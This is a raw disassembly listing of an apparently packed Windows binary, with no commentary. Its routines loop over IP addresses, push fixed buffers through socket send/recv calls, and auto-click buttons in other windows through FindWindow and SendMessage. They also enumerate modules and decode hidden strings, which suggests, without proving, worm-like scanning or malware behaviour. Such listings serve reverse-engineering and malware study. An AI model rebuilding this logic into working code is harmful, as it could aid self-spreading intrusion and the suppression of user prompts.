cmp eax, 0FFFFFFFFh
jz loc_405369
push 0
push 640h
lea edx, [esp+10h+arg_130]
push edx
push ebx
call esi ; recv
xor eax, eax
mov [esp+arg_28], eax
mov [esp+arg_2C], eax
mov [esp+arg_30], eax
mov [esp+arg_34], eax
mov dword ptr [esp+arg_38], eax
mov dword ptr [esp+arg_3C], eax
mov [esp+arg_40], eax
mov [esp+arg_44], eax
jmp short loc_405130
; ---------------------------------------------------------------------------
align 10h
loc_405130: ; CODE XREF: sub_404DB0+377�j
; sub_404DB0+38F�j
mov cl, [esp+eax*2+arg_168]
mov byte ptr [esp+eax+arg_28], cl
inc eax
cmp eax, 0Ch
jl short loc_405130
movsx edx, byte ptr [esp+arg_8+3]
push 0
add edx, 4
mov byte ptr [esp+eax+4+arg_28], 0
push edx
lea eax, [esp+8+arg_70]
push eax
push ebx
call edi ; send
cmp eax, 0FFFFFFFFh
jz loc_405369
push 0
push 640h
lea ecx, [esp+10h+arg_130]
push ecx
push ebx
call esi ; recv
push 0
push 68h
push offset dword_4282E8
push ebx
call edi ; send
cmp eax, 0FFFFFFFFh
jz loc_405369
push 0
push 640h
lea edx, [esp+10h+arg_130]
push edx
push ebx
call esi ; recv
push 0
push 0A0h
push offset dword_428358
push ebx
call edi ; send
cmp eax, 0FFFFFFFFh
jz loc_405369
push 0
push 640h
lea eax, [esp+10h+arg_130]
push eax
push ebx
call esi ; recv
push 0Ch
push (offset locret_428F67+1)
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea ecx, [esp+0Ch+arg_20]
push ecx
call sub_419312
add esp, 8
test eax, eax
jnz loc_4052A7
mov ecx, 1Ah
mov esi, offset dword_428518
lea edi, [esp+8+arg_6398]
rep movsd
mov ecx, 6D6h
lea esi, [esp+8+arg_46A8]
lea edi, [esp+8+arg_6400]
rep movsd
movsw
mov ecx, 1Ch
mov esi, offset dword_428588
lea edi, [esp+8+arg_25D0]
rep movsd
mov ecx, 297h
lea esi, [esp+8+arg_573C]
lea edi, [esp+8+arg_2640]
rep movsd
push eax
movsw
push 10FCh
lea edx, [esp+10h+arg_6398]
mov ecx, 21h
mov esi, offset dword_428600
lea edi, [esp+10h+arg_3104]
push edx
rep movsd
mov esi, dword_424274
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_405369
push 0
push 640h
lea eax, [esp+10h+arg_130]
push eax
push ebx
call dword_42425C ; recv
push 0
push 0FDCh
lea ecx, [esp+10h+arg_25D0]
push ecx
push ebx
call esi ; send
cmp eax, 0FFFFFFFFh
jz loc_405369
loc_4052A7: ; CODE XREF: sub_404DB0+439�j
push 0Ch
push offset dword_428F74
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea edx, [esp+0Ch+arg_20]
push edx
call sub_419312
add esp, 8
test eax, eax
jnz short loc_405326
mov ecx, 1Fh
mov esi, offset dword_428400
lea edi, [esp+8+arg_15E8]
rep movsd
mov ecx, 1F4h
lea esi, [esp+8+arg_770]
lea edi, [esp+8+arg_1664]
rep movsd
push eax
mov ecx, 24h
mov esi, offset off_428480
lea edi, [esp+0Ch+arg_1E34]
rep movsd
mov [esp+0Ch+arg_22DF], al
push 0CF8h
lea eax, [esp+10h+arg_15E8]
push eax
push ebx
call dword_424274 ; send
cmp eax, 0FFFFFFFFh
jz short loc_405369
loc_405326: ; CODE XREF: sub_404DB0+518�j
mov ecx, [ebp+arg_0]
mov esi, [esp+8+arg_4]
push 0F89h
push ecx
mov ecx, esi
call sub_404B60
mov edx, [esi+142Ch]
cmp eax, [edx+658h]
jnz short loc_405369
push ebx
call dword_42426C ; closesocket
mov eax, 1
mov ecx, [esp+0Ch+arg_8470]
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
loc_405369: ; CODE XREF: sub_404DB0+2C5�j
; sub_404DB0+2E3�j ...
push ebx
call dword_42426C ; closesocket
loc_405370: ; CODE XREF: sub_404DB0+284�j
mov ecx, [esp+0Ch+arg_8470]
xor eax, eax
call sub_4192B6
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
sub_404DB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405390 proc near ; DATA XREF: UPX0:0042442C�o
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset SEH_405390
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov esi, ecx
mov eax, [esi+1Ch]
xor edi, edi
cmp eax, edi
mov [ebp+var_10], esp
jz loc_405456
push 0FFFFFFFEh
mov [ebp+var_4], edi
call dword_4240A4 ; GetCurrentThread
push eax
call dword_4240A0 ; SetThreadPriority
call dword_4240B8 ; GetCurrentThreadId
push eax
call sub_419846
add esp, 4
loc_4053E1: ; CODE XREF: sub_405390+C4�j
cmp [esi+18h], edi
jnz short loc_405456
cmp [esi+20h], edi
jnz short loc_4053F2
mov ecx, esi
call sub_404A80
loc_4053F2: ; CODE XREF: sub_405390+59�j
xor bl, bl
loc_4053F4: ; CODE XREF: sub_405390+AD�j
or al, 0FFh
cmp bl, al
mov eax, [esi+18h]
ja short loc_405445
cmp eax, edi
jnz short loc_405456
cmp [esi+27h], bl
jz short loc_40543B
mov al, [esi+24h]
mov cl, [esi+25h]
mov dl, [esi+26h]
mov [ebp+var_14], edi
mov byte ptr [ebp+var_14], al
mov byte ptr [ebp+var_14+1], cl
mov byte ptr [ebp+var_14+2], dl
mov byte ptr [ebp+var_14+3], bl
mov eax, [ebp+var_14]
push eax
call dword_424258 ; inet_ntoa
lea ecx, [ebp+var_14]
push ecx
mov ecx, esi
call sub_404DB0
push 64h
call dword_42408C ; Sleep
loc_40543B: ; CODE XREF: sub_405390+74�j
inc bl
jmp short loc_4053F4
; ---------------------------------------------------------------------------
loc_40543F: ; DATA XREF: UPX0:00426394�o
mov eax, offset loc_405456
retn
; ---------------------------------------------------------------------------
loc_405445: ; CODE XREF: sub_405390+6B�j
cmp eax, edi
jnz short loc_405456
push 2BF20h
call dword_42408C ; Sleep
jmp short loc_4053E1
; ---------------------------------------------------------------------------
loc_405456: ; CODE XREF: sub_405390+2A�j
; sub_405390+54�j ...
mov ecx, [ebp+var_C]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
mov esp, ebp
pop ebp
retn
sub_405390 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405470 proc near ; CODE XREF: sub_40C480+189�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
call sub_418F60
mov eax, [esp+4+arg_0]
mov [esi+18h], eax
xor eax, eax
mov [esi+1Ch], eax
mov [esi+20h], eax
mov dword ptr [esi], offset off_424444
mov eax, esi
pop esi
retn 4
sub_405470 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4054A0 proc near ; CODE XREF: UPX0:00405583�p
mov dword ptr [ecx], offset off_424444
jmp sub_418F90
sub_4054A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4054B0 proc near ; CODE XREF: sub_40C7C0+78�p
push esi
mov esi, ecx
mov eax, [esi+20h]
test eax, eax
jnz short loc_405502
push 15h
push offset dword_428F80
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+24h]
mov edi, edi
loc_4054D0: ; CODE XREF: sub_4054B0+28�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4054D0
push 13h
push offset dword_428F98
mov ecx, offset off_42AE60
call sub_406AE0
lea edx, [esi+0C4h]
loc_4054F1: ; CODE XREF: sub_4054B0+49�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_4054F1
mov dword ptr [esi+20h], 1
loc_405502: ; CODE XREF: sub_4054B0+8�j
pop esi
retn
sub_4054B0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405510 proc near ; DATA XREF: UPX0:00424448�o
push edi
mov edi, ecx
mov eax, [edi+20h]
test eax, eax
jz short loc_40557E
mov eax, [edi+1Ch]
test eax, eax
jnz short loc_40557E
push ebx
mov ebx, dword_4241F8
push ebp
mov ebp, dword_4241EC
push esi
loc_405530: ; CODE XREF: sub_405510+69�j
lea eax, [edi+24h]
push eax
push 0
call dword_4241E8 ; FindWindowA
test eax, eax
jz short loc_40556C
lea ecx, [edi+0C4h]
push ecx
push 0
push 0
push eax
call ebp ; FindWindowExA
mov esi, eax
test esi, esi
jz short loc_40556C
push 0
push 0
push 201h
push esi
call ebx ; SendMessageA
push 0
push 0
push 202h
push esi
call ebx ; SendMessageA
loc_40556C: ; CODE XREF: sub_405510+2E�j
; sub_405510+42�j
push 5
call dword_42408C ; Sleep
mov eax, [edi+1Ch]
test eax, eax
jz short loc_405530
pop esi
pop ebp
pop ebx
loc_40557E: ; CODE XREF: sub_405510+8�j
; sub_405510+F�j
pop edi
retn
sub_405510 endp
; ---------------------------------------------------------------------------
loc_405580: ; DATA XREF: UPX0:off_424444�o
push esi
mov esi, ecx
call sub_4054A0
test byte ptr [esp+8], 1
jz short loc_405598
push esi
call sub_41930D
add esp, 4
loc_405598: ; CODE XREF: UPX0:0040558D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4055A0 proc near ; CODE XREF: sub_40C480+1BC�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
call sub_418F60
mov eax, [esp+4+arg_0]
mov [esi+18h], eax
xor eax, eax
mov [esi+30h], eax
mov [esi+2Ch], eax
mov dword ptr [esi], offset off_42444C
mov eax, esi
pop esi
retn 4
sub_4055A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4055D0 proc near ; CODE XREF: UPX0:00405783�p
mov dword ptr [ecx], offset off_42444C
jmp sub_418F90
sub_4055D0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4055E0 proc near ; CODE XREF: sub_40C7C0+84�p
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 108h
mov eax, dword_42A290
push ebx
mov ebx, ecx
mov [esp+10Ch+var_4], eax
mov eax, [ebx+30h]
test eax, eax
jnz loc_4056BA
mov eax, [esp+10Ch+arg_0]
mov [ebx+1Ch], eax
add eax, 4
lea edx, [esp+10Ch+var_108]
sub edx, eax
loc_405613: ; CODE XREF: sub_4055E0+3B�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_405613
push esi
lea eax, [esp+110h+var_108]
push edi
push eax
call sub_41A0AD
add esp, 4
push 11h
push offset dword_428FAC
mov ecx, offset off_42AE60
call sub_406AE0
lea edi, [ebx+34h]
mov edx, edi
loc_405642: ; CODE XREF: sub_4055E0+6A�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_405642
lea eax, [esp+114h+var_108]
mov edx, eax
loc_405652: ; CODE XREF: sub_4055E0+77�j
mov cl, [eax]
inc eax
test cl, cl
jnz short loc_405652
sub eax, edx
dec edi
lea esp, [esp+0]
loc_405660: ; CODE XREF: sub_4055E0+86�j
mov cl, [edi+1]
inc edi
test cl, cl
jnz short loc_405660
mov ecx, eax
shr ecx, 2
mov esi, edx
rep movsd
mov ecx, eax
and ecx, 3
push 2Ah
rep movsb
push offset loc_428FC0
mov ecx, offset off_42AE60
call sub_406AE0
pop edi
lea edx, [ebx+0D4h]
pop esi
loc_405691: ; CODE XREF: sub_4055E0+B9�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_405691
mov dx, word_424454
lea ecx, [ebx+114h]
mov [ecx], dx
mov al, byte_424456
mov [ecx+2], al
mov dword ptr [ebx+30h], 1
loc_4056BA: ; CODE XREF: sub_4055E0+1A�j
mov ecx, [esp+10Ch+var_4]
pop ebx
call sub_4192B6
add esp, 108h
retn 4
sub_4055E0 endp
; =============== S U B R O U T I N E =======================================
sub_4056D0 proc near ; DATA XREF: UPX0:00424450�o
push ebp
mov ebp, ecx
call dword_4240A4 ; GetCurrentThread
push 0Fh
push eax
call dword_4240A0 ; SetThreadPriority
mov eax, [ebp+2Ch]
test eax, eax
jnz loc_40577E
push ebx
mov ebx, dword_4241F8
push esi
push edi
loc_4056F6: ; CODE XREF: sub_4056D0+A5�j
lea eax, [ebp+34h]
push eax
push 0
call dword_4241E8 ; FindWindowA
mov edi, eax
test edi, edi
jz short loc_405768
lea eax, [ebp+0D4h]
push eax
push 0
push 0
push edi
call dword_4241EC ; FindWindowExA
mov esi, eax
test esi, esi
jz short loc_405768
push 0
push 0
push 201h
push esi
call ebx ; SendMessageA
push 0
push 0
push 202h
push esi
call ebx ; SendMessageA
lea ecx, [ebp+114h]
push ecx
push 0
push 0
push edi
call dword_4241EC ; FindWindowExA
mov esi, eax
test esi, esi
jz short loc_405768
push 0
push 0
push 201h
push esi
call ebx ; SendMessageA
push 0
push 0
push 202h
push esi
call ebx ; SendMessageA
loc_405768: ; CODE XREF: sub_4056D0+36�j
; sub_4056D0+4E�j ...
push 1
call dword_42408C ; Sleep
mov eax, [ebp+2Ch]
test eax, eax
jz loc_4056F6
pop edi
pop esi
pop ebx
loc_40577E: ; CODE XREF: sub_4056D0+17�j
pop ebp
retn
sub_4056D0 endp
; ---------------------------------------------------------------------------
loc_405780: ; DATA XREF: UPX0:off_42444C�o
push esi
mov esi, ecx
call sub_4055D0
test byte ptr [esp+8], 1
jz short loc_405798
push esi
call sub_41930D
add esp, 4
loc_405798: ; CODE XREF: UPX0:0040578D�j
mov eax, esi
pop esi
retn 4
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4057A0 proc near ; CODE XREF: sub_40C480+92�p
arg_0 = dword ptr 4
push esi
mov esi, ecx
push edi
lea ecx, [esi+61Ch]
mov dword ptr [esi], offset off_424458
call sub_404540
lea ecx, [esi+62Ch]
call sub_404540
lea ecx, [esi+63Ch]
call sub_404540
lea ecx, [esi+64Ch]
call sub_404540
lea ecx, [esi+65Ch]
call sub_404540
lea ecx, [esi+66Ch]
call sub_404540
lea ecx, [esi+67Ch]
call sub_404540
lea ecx, [esi+68Ch]
call sub_404540
lea ecx, [esi+69Ch]
call sub_404540
mov edx, [esp+8+arg_0]
xor eax, eax
mov ecx, 41h
lea edi, [esi+4]
rep stosd
mov ecx, 41h
lea edi, [esi+108h]
rep stosd
lea ecx, [esi+6ACh]
mov [ecx], eax
mov [ecx+4], eax
mov [ecx+8], eax
mov [ecx+0Ch], eax
xor edi, edi
push 100h
mov [esi+6BCh], edi
mov [esi+6D0h], edi
mov [esi+6D4h], edi
mov [esi+6C8h], edx
call sub_4191BC
add esp, 4
mov [esi+6C4h], edi
mov [esi+6C0h], eax
pop edi
mov dword ptr [esi+6CCh], 1
mov eax, esi
pop esi
retn 4
sub_4057A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405880 proc near ; CODE XREF: sub_405C60+3�p
push esi
mov esi, ecx
mov eax, [esi+6C4h]
push edi
xor edi, edi
test eax, eax
mov dword ptr [esi], offset off_424458
jle short loc_4058B3
loc_405896: ; CODE XREF: sub_405880+31�j
mov eax, [esi+6C0h]
mov ecx, [eax+edi*4]
push ecx
call sub_4198AE
mov eax, [esi+6C4h]
add esp, 4
inc edi
cmp edi, eax
jl short loc_405896
loc_4058B3: ; CODE XREF: sub_405880+14�j
mov edx, [esi+6C0h]
push edx
call sub_4198AE
lea eax, [esi+61Ch]
push eax
call sub_404590
lea ecx, [esi+62Ch]
push ecx
call sub_404590
lea edx, [esi+63Ch]
push edx
call sub_404590
lea eax, [esi+64Ch]
push eax
call sub_404590
lea ecx, [esi+65Ch]
push ecx
call sub_404590
lea edx, [esi+66Ch]
push edx
call sub_404590
lea eax, [esi+67Ch]
push eax
call sub_404590
lea ecx, [esi+68Ch]
push ecx
call sub_404590
add esi, 69Ch
push esi
call sub_404590
add esp, 28h
pop edi
pop esi
retn
sub_405880 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405940 proc near ; CODE XREF: sub_40C7C0+60�p
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_208 = byte ptr -208h
var_108 = byte ptr -108h
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 230h
mov eax, dword_42A290
push ebx
push ebp
push esi
push edi
mov ebp, ecx
mov [esp+240h+var_4], eax
lea eax, [ebp+61Ch]
push 800h
push eax
call sub_404550
lea ecx, [ebp+62Ch]
push 800h
push ecx
call sub_404550
lea edx, [ebp+63Ch]
push 800h
push edx
call sub_404550
add esp, 18h
call dword_4240CC ; GetCurrentProcessId
push eax
push 8
call sub_4191B6 ; CreateToolhelp32Snapshot
mov ebx, eax
lea eax, [esp+240h+var_228]
push eax
lea esi, [ebp+108h]
lea edi, [ebp+4]
push ebx
mov [esp+248h+var_228], 224h
mov byte ptr [esi], 0
mov byte ptr [edi], 0
call sub_4191B0 ; Module32First
test eax, eax
jz loc_405B0E
lea ecx, [esp+240h+var_108]
push ecx
call sub_419A76
lea edx, [esp+244h+var_208]
push edx
call sub_419A76
add esp, 8
push 5
push offset dword_428FEC
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+244h+var_208]
push eax
call sub_4199F0
add esp, 8
test eax, eax
jnz short loc_405A28
push 5
push offset dword_428FF4
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea ecx, [esp+244h+var_208]
push ecx
call sub_4199F0
add esp, 8
test eax, eax
jz short loc_405A60
loc_405A28: ; CODE XREF: sub_405940+C3�j
lea eax, [esp+240h+var_108]
mov edx, esi
mov ecx, eax
sub edx, ecx
loc_405A35: ; CODE XREF: sub_405940+FD�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_405A35
lea eax, [esp+240h+var_208]
mov edx, edi
mov ecx, eax
sub edx, ecx
lea esp, [esp+0]
loc_405A50: ; CODE XREF: sub_405940+118�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_405A50
jmp loc_405AFE
; ---------------------------------------------------------------------------
align 10h
loc_405A60: ; CODE XREF: sub_405940+E6�j
; sub_405940+191�j
lea eax, [esp+240h+var_228]
push eax
push ebx
call sub_4191AA ; Module32Next
test eax, eax
jz loc_405B0E
lea ecx, [esp+240h+var_108]
push ecx
call sub_419A76
lea edx, [esp+244h+var_208]
push edx
call sub_419A76
add esp, 8
push 5
push offset dword_428FFC
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea eax, [esp+244h+var_208]
push eax
call sub_4199F0
add esp, 8
test eax, eax
jnz short loc_405AD3
push 5
push offset dword_429004
mov ecx, offset off_42AE60
call sub_406AE0
push eax
lea ecx, [esp+244h+var_208]
push ecx
call sub_4199F0
add esp, 8
test eax, eax
jz short loc_405A60
loc_405AD3: ; CODE XREF: sub_405940+16E�j
lea eax, [esp+240h+var_108]
mov edx, esi
mov ecx, eax
sub edx, ecx
loc_405AE0: ; CODE XREF: sub_405940+1A8�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_405AE0
lea eax, [esp+240h+var_208]
mov edx, edi
mov ecx, eax
sub edx, ecx
loc_405AF4: ; CODE XREF: sub_405940+1BC�j
mov cl, [eax]
mov [edx+eax], cl
inc eax
test cl, cl
jnz short loc_405AF4
loc_405AFE: ; CODE XREF: sub_405940+11A�j
lea edx, [ebp+20Ch]
push edx
push esi
call sub_40EE90
add esp, 8
loc_405B0E: ; CODE XREF: sub_405940+82�j
; sub_405940+12D�j
mov edi, dword_42406C
push ebx
call edi ; CloseHandle
push 0
push 1
push 3
push 0
push 1
push 80000000h
push esi
call dword_424074 ; CreateFileA
mov esi, eax
push 0
push esi
call dword_4240BC ; GetFileSize
push esi
mov [ebp+6BCh], eax
call edi ; CloseHandle
mov esi, [esp+240h+arg_0]
test esi, esi
mov dword ptr [ebp+6D0h], 11111111h
mov dword ptr [ebp+6D4h], 44332211h
jz loc_405C17
xor edi, edi
mov [esp+240h+var_230], edi
lea ebx, [ebx+0]
loc_405B70: ; CODE XREF: sub_405940+2CC�j
mov al, [esi]
cmp al, 20h
mov ecx, esi
mov [esp+240h+var_22C], ecx
jz short loc_405B90
lea esp, [esp+0]
loc_405B80: ; CODE XREF: sub_405940+24A�j
test al, al
jz short loc_405B8C
mov al, [ecx+1]
inc ecx
cmp al, 20h
jnz short loc_405B80
loc_405B8C: ; CODE XREF: sub_405940+242�j
mov [esp+240h+var_22C], ecx
loc_405B90: ; CODE XREF: sub_405940+23A�j
mov ebx, ecx
sub ebx, esi
jz short loc_405BFF
lea eax, [ebx+1]
push eax
call sub_4191BC
mov ecx, [ebp+6C0h]
mov [ecx+edi*4], eax
mov edx, [ebp+6C0h]
mov edi, [edx+edi*4]
mov ecx, ebx
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+6C0h]
mov esi, [esp+244h+var_230]
mov edx, [ecx+esi*4]
add esp, 4
test esi, esi
mov byte ptr [ebx+edx], 0
jnz short loc_405BF4
mov eax, [ebp+6C0h]
mov ecx, [eax]
push ecx
call sub_419C6A
add esp, 4
test eax, eax
jnz short loc_405BF4
mov [ebp+6CCh], eax
loc_405BF4: ; CODE XREF: sub_405940+297�j
; sub_405940+2AC�j
mov ecx, [esp+240h+var_22C]
inc esi
mov [esp+240h+var_230], esi
mov edi, esi
loc_405BFF: ; CODE XREF: sub_405940+254�j
cmp byte ptr [ecx], 0
jz short loc_405C11
cmp edi, 40h
jz short loc_405C11
lea esi, [ecx+1]
jmp loc_405B70
; ---------------------------------------------------------------------------
loc_405C11: ; CODE XREF: sub_405940+2C2�j
; sub_405940+2C7�j
mov [ebp+6C4h], edi
loc_405C17: ; CODE XREF: sub_405940+21E�j
push 9
add ebp, 6ACh
push ebp
call sub_40F170
mov ecx, [esp+248h+var_4]
add esp, 8
pop edi
pop esi
pop ebp
pop ebx
call sub_4192B6
add esp, 230h
retn 4
sub_405940 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405C50 proc near ; CODE XREF: sub_40C950+23C�p
arg_0 = dword ptr 4
mov eax, [ecx+6C0h]
mov ecx, [esp+arg_0]
mov eax, [eax+ecx*4]
retn 4
sub_405C50 endp
; =============== S U B R O U T I N E =======================================
sub_405C60 proc near ; DATA XREF: UPX0:off_424458�o
arg_0 = byte ptr 4
push esi
mov esi, ecx
call sub_405880
test [esp+4+arg_0], 1
jz short loc_405C78
push esi
call sub_41930D
add esp, 4
loc_405C78: ; CODE XREF: sub_405C60+D�j
mov eax, esi
pop esi
retn 4
sub_405C60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405C80 proc near ; CODE XREF: sub_40C480+156�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, ecx
push edi
xor eax, eax
mov ecx, 1Eh
mov edi, esi
rep stosd
mov eax, [esp+8+arg_0]
mov ecx, [esp+8+arg_4]
push 80h
mov [esi+4], eax
mov [esi], ecx
mov dword ptr [esi+70h], 0
call sub_4191BC
mov [esi+8], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405CC1
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405CC1: ; CODE XREF: sub_405C80+3A�j
push eax
call sub_4191BC
push 80h
mov [esi+0Ch], eax
call sub_4191BC
mov [esi+10h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405CE8
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405CE8: ; CODE XREF: sub_405C80+61�j
push eax
call sub_4191BC
push 80h
mov [esi+14h], eax
call sub_4191BC
mov [esi+18h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405D0F
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405D0F: ; CODE XREF: sub_405C80+88�j
push eax
call sub_4191BC
push 20h
mov [esi+1Ch], eax
call sub_4191BC
mov [esi+20h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405D33
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405D33: ; CODE XREF: sub_405C80+AC�j
push eax
call sub_4191BC
push 20h
mov [esi+24h], eax
call sub_4191BC
mov [esi+28h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405D57
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405D57: ; CODE XREF: sub_405C80+D0�j
push eax
call sub_4191BC
push 20h
mov [esi+2Ch], eax
call sub_4191BC
mov [esi+30h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405D7B
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405D7B: ; CODE XREF: sub_405C80+F4�j
push eax
call sub_4191BC
push 20h
mov [esi+34h], eax
call sub_4191BC
mov [esi+38h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405D9F
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405D9F: ; CODE XREF: sub_405C80+118�j
push eax
call sub_4191BC
push 20h
mov [esi+3Ch], eax
call sub_4191BC
mov [esi+40h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405DC3
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405DC3: ; CODE XREF: sub_405C80+13C�j
push eax
call sub_4191BC
add esp, 40h
push 80h
mov [esi+44h], eax
call sub_4191BC
mov [esi+48h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405DED
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405DED: ; CODE XREF: sub_405C80+166�j
push eax
call sub_4191BC
push 20h
mov [esi+4Ch], eax
call sub_4191BC
mov [esi+50h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405E11
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405E11: ; CODE XREF: sub_405C80+18A�j
push eax
call sub_4191BC
push 104h
mov [esi+54h], eax
call sub_4191BC
mov [esi+74h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405E38
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405E38: ; CODE XREF: sub_405C80+1B1�j
push eax
call sub_4191BC
push 80h
mov [esi+58h], eax
call sub_4191BC
mov [esi+5Ch], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405E5F
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405E5F: ; CODE XREF: sub_405C80+1D8�j
push eax
call sub_4191BC
push 20h
mov [esi+60h], eax
call sub_4191BC
mov [esi+64h], eax
call sub_419853
and eax, 8000007Fh
jns short loc_405E83
dec eax
or eax, 0FFFFFF80h
inc eax
loc_405E83: ; CODE XREF: sub_405C80+1FC�j
push eax
call sub_4191BC
push 80h
mov [esi+68h], eax
call sub_4191BC
add esp, 2Ch
mov [esi+6Ch], eax
pop edi
mov eax, esi
pop esi
retn 8
sub_405C80 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405EB0 proc near ; CODE XREF: sub_40CBE0+DF�p
push esi
mov esi, ecx
mov eax, [esi+8]
push eax
call sub_4198AE
mov ecx, [esi+10h]
push ecx
call sub_4198AE
mov edx, [esi+18h]
push edx
call sub_4198AE
mov eax, [esi+20h]
push eax
call sub_4198AE
mov ecx, [esi+28h]
push ecx
call sub_4198AE
mov edx, [esi+30h]
push edx
call sub_4198AE
mov eax, [esi+38h]
push eax
call sub_4198AE
mov ecx, [esi+40h]
push ecx
call sub_4198AE
mov edx, [esi+48h]
push edx
call sub_4198AE
mov eax, [esi+50h]
push eax
call sub_4198AE
mov ecx, [esi+74h]
push ecx
call sub_4198AE
mov edx, [esi+5Ch]
push edx
call sub_4198AE
mov eax, [esi+64h]
push eax
call sub_4198AE
mov ecx, [esi+6Ch]
push ecx
call sub_4198AE
mov edx, [esi+0Ch]
push edx
call sub_4198AE
mov eax, [esi+14h]
push eax
call sub_4198AE
mov ecx, [esi+1Ch]
add esp, 40h
push ecx
call sub_4198AE
mov edx, [esi+24h]
push edx
call sub_4198AE
mov eax, [esi+2Ch]
push eax
call sub_4198AE
mov ecx, [esi+34h]
push ecx
call sub_4198AE
mov edx, [esi+3Ch]
push edx
call sub_4198AE
mov eax, [esi+44h]
push eax
call sub_4198AE
mov ecx, [esi+4Ch]
push ecx
call sub_4198AE
mov edx, [esi+54h]
push edx
call sub_4198AE
mov eax, [esi+58h]
push eax
call sub_4198AE
mov ecx, [esi+60h]
push ecx
call sub_4198AE
mov edx, [esi+68h]
push edx
call sub_4198AE
add esp, 2Ch
pop esi
retn
sub_405EB0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_405FB0 proc near ; CODE XREF: sub_40C7C0+70�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = byte ptr -4
sub esp, 0Ch
push esi
mov esi, ecx
mov eax, [esi+70h]
test eax, eax
jnz loc_4061D2
mov eax, [esi+4]
test eax, eax
jz loc_4061D2
push 36h
push offset dword_42900C
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+10h]
loc_405FE0: ; CODE XREF: sub_405FB0+38�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_405FE0
push 2Ah
push offset dword_429044
mov ecx, offset off_42AE60
call sub_406AE0
mov edx, [esi+8]
mov edi, edi
loc_406000: ; CODE XREF: sub_405FB0+58�j
mov cl, [eax]
inc eax
mov [edx], cl
inc edx
test cl, cl
jnz short loc_406000
push 2Eh
